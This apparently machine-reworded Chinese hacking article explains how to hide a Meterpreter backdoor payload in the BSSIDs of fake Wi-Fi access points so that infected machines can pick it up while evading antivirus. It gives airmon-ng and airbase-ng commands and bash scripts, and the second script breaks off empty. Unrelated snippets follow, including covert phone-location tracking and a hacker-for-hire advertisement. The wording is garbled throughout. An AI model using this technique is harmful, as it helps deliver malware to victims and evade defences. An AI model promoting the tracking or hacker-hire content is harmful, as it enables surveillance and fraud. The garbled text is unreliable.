根据无线流量和BSSID传送后门有效载荷

访客3年前黑客文章1313

在本文中,我觉得聊一聊无线 *** AP和BSSID(AP的MAC地址)。大家的后门有效载荷沒有开展系统文件数据加密和硬编码,因而我们可以运用这类方式绕开电脑杀毒软件。大家的Meterpreter 有效载荷在数据流量中传送。

在这类状况下, *** 攻击能够根据伪造BSSID(环城路变更,伪造AP)和逐渐将后门有效载荷引入到BSSID(伪造的AP的MAC地址)启动进攻。在手机客户端,被感染的系统软件(后门系统软件)能够根据在AIR上扫描仪AP的MAC地址(BSSID)来转储这种有效载荷,不用根据user-pass联接到伪造的AP。根据Wifi机器设备传送有效载荷,比如wlan(无线流量)也在我的探讨范畴以内。在AIR上扫描仪BSSID 转储有效载荷后,Meterpreter对话根据Ethernet Network创建(沒有Wifi 或是无线 *** 设备)。

恶意程序编码或简易的后门编码能够运用WIFI机器设备传送或是转储有效载荷,比如Wlan,最终你将获得有简易C#编码的 meterpreter 对话。

在本文中,我应用Wifi机器设备只是是传送有效载荷(步骤1),根据扫描仪Wifi机器设备MAC地址(BSSID) 转储这种有效载荷,随后我的后门将根据eth0或Ethernet卡创建Meterpreter 对话,因而在这个环节(步骤2),大家应用数据流量来创建Meterpreter 对话,不应用WIFI机器设备,。

留意:假如你要只根据WIFI机器设备来进行步骤1和步骤2,我觉得技术性上是行得通的,可是自己沒有检测过。在步骤2中你很有可能会必须采用EvilTwin AP,还必须使Meterpreter Listener在伪造的AP互联网子网中有一个IP地址,你能应用MANA-Toolkit来进行这一实际操作。

连接:

这一方式的关键是啥

关键是:恶意程序或后门有效载荷引入到WiFi机器设备的BSSID,及其根据无线流量传送是很有可能的。

从伪造的AP扫描仪引入的有效载荷到BSSID,步骤以下

比如我们要传送下列的有效载荷:

“fec9a00011ddc00945f1”

步骤1: *** 攻击系统软件将伪造的AP取名为“Fake”,MAC地址为00:fe:c8:b0:00:11

留意:Mac详细地址00:fe:c8:b0:00:11是引入的有效载荷,因此大家的有效载荷是“fec9a00011”,是有效载荷“fec9a00011ddc00945f1”的上半部分。

步骤2:后门系统软件扫描仪Essid“Fake”并转储BSSID

留意:你的后门编码应当转储这些的BSSID或Mac详细地址fe:c8:b0:00:11==> fec9a00011

步骤3: *** 攻击系统软件将伪造的AP取名为“Fake”,Mac详细地址是00:dd:c0:09:45:f1

留意:Mac详细地址00:dd:c0:09:45:f1是引入的有效载荷,因此大家的有效载荷是“ddc00945f1”,是有效载荷 “fec9a00011ddc00945f1”的下半一部分。

步骤4:后门系统软件扫描仪Essid“Fake”并转储BSSID

留意:你的后门编码应当转储这些的BSSID或Mac详细地址dd:c0:09:45:f1==> ddc00945f1

这2步扫描仪以后,在被感染的系统软件(后门系统软件)中你可能获得有效载荷 fec9a00011ddc00945f1。

如今你了解了这类方式的原理,下面我将根据在linux端命令向你展现(步骤1和步骤3)大量的信息内容。下边我将根据命令伪造AP。

可选命令:在建立Wlan0Mon以前变更WiFi卡的TXPower,这种命令能够协助你更强的伪造AP数据信号,便于你能手动式实际操作此命令。

ifconfig wlan0 down

iw reg set BO

ifconfig wlan0 up

iwconfig wlan0 txpower 30

留意:这种命令在根据airmon-ng建立Wlan0Mon以前就该应用,这种命令是可选择的,并不是必不可少的。

应用WLAN卡的监管方式是伪造AP的关键步骤

你能应用命令“airmon-ng start wlan0”为Wlan0建立“Wlan0Mon”监管方式。

留意:你能手动式运作此命令,或是能够在script1.sh文件中应用此命令,如步骤(cmd 1-1)。在文中中,我还在 *** 攻击端手动式运作此命令。

步骤1: *** 攻击系统软件将伪造的AP取名为“Fake”,MAC地址为00:fe:c8:b0:00:11。

留意:Mac详细地址00:fe:c8:b0:00:11是引入的有效载荷,因此大家的有效载荷是“fec9a00011”

cmd 1-1:airmon-ng start wlan0

留意:建立Wlan0Mon(监管方式)

cmd 1-2:airbase-ng -a 00:fe:c8:b0:00:11 -essid“Fake”-I 10 -0 wlan0Mon

留意:你需要15秒伪造AP,15秒后你能根据killall命令在cmd 1-2停止这一命令。

cmd 1-3:sleep 15

cmd 1-4:killall airbase-ng

步骤3: *** 攻击系统软件将伪造的AP取名为“Fake”,MAC地址为00:dd:c0:09:45:f1

留意:Mac详细地址00:dd:c0:09:45:f1是引入的有效载荷,因此大家的有效载荷是“ddc00945f1”

cmd 3-1:airbase-ng -a 00:dd:c0:09:45:f1 -essid“Fake”-I 10 -0 wlan0Mon

留意:你需要15秒伪造AP,15秒后你能根据killall命令在cmd 3-1停止这一命令。cmd 3-2:sleep 15

cmd 3-3:killall airbase-ng

你能见到在执行这种步骤的情况下,大家必须应用之上命令,可是我还在airbase-ng命令上碰到了问题。

难题及其解决 ***

难题出現在步骤(cmd 1-2)到(cmd 1-3)。

在步骤(cmd 1-2)以后,仅有根据ctrl c或kill能停止airbaseng命令,所以我的bash脚本 *** 一直停在步骤(cmd 1-2),直至我停止了过程。

对于这个问题,我的解决 *** 是应用2 个bash脚本文件:

之一个bash脚本文件是 “Script1.sh”, 应用于步骤(cmd 1-2和cmd 3-1)

留意:你能在bash脚本 *** 的之一行中加上步骤(cmd 1-1)或手动式实行。在文中中,我手动式实行cmd 1-1。

第二个bash脚本 *** 是 “Script2.sh”,应用于步骤(cmd 1-3 & cmd 1-4 & cmd 3-2 & cmd 3-3)

因此在这类状况下,大家应当更先运作bash脚本 *** “Script1.sh”,随后马上或2-3秒后运作bash脚本 *** “Script2.sh”。

大家获得下列的文档:

Script1.sh文件:

#!/ bin / bash

airbase-ng -a 00:fe:c8:b0:00:11 -essid“Fake”-I 10 -0 wlan0Mon;

airbase-ng -a 00:dd:c0:09:45:f1 -essid“Fake”-I 10 -0 wlan0Mon;

Script2.sh文件:

#!/bin/bash

相关文章

中国的节日有哪些(中国传统节日及习俗)

中国的节日有哪些(中国传统节日及习俗) 1.除夕——农历十二月二十九或三十 习俗 : 吃团圆饭,祭祀,熬夜守岁。 除夕人们往往通宵不眠,叫做“守岁”。除夕这一天,家里家外都要打扫得干干净净,还要...

夫妻分居多长时间可以自动离婚 分居两年可以自动离婚吗

有些人由于另一半不同意离异,因此 挑选与另一方两地分居,讨论一下夫妻分居多久能够自动离婚? 一、夫妻分居多久能够自动离婚 1、两地分居没法自动离婚 两地分居是没法自动离婚的,大伙儿一定要清晰...

怎么样才能了解一个人的行踪 有什么定位可以追踪位置

怎么样才能了解一个人的行踪呢,并且有什么定位可以追踪位置呢,您只需要在手机上安装该软件即可确定其他号码的位置,原理是通过服务器后台接收对方手机的信号源,以确定准确的位置,然后将其反馈给您的软件,精度高...

找黑客在线QQ接单做软件黑客接单一般多少钱

昨天,孙先生收到一封电子邮件,内容为推荐新代理业务,而当他点击后面的链接时,竟弹出一个模仿淘宝网的登录页面。有过丢失账户经历的孙先生称,这可能是对方诱人输入密码,窃取其账户内资金的一种骗局。随后,记者...

微信花呗什么时候开通 微信花呗什么时候上线

现阶段微信花呗仅仅在网络约车行业应用,都还没彻底发布,开展全面推行,将来微信花呗将遮盖日常生活的各行各业,那麼微信花呗何时启用?何时发布?下边产生详细介绍。 微信花呗何时启用? 现阶段“分付”还处...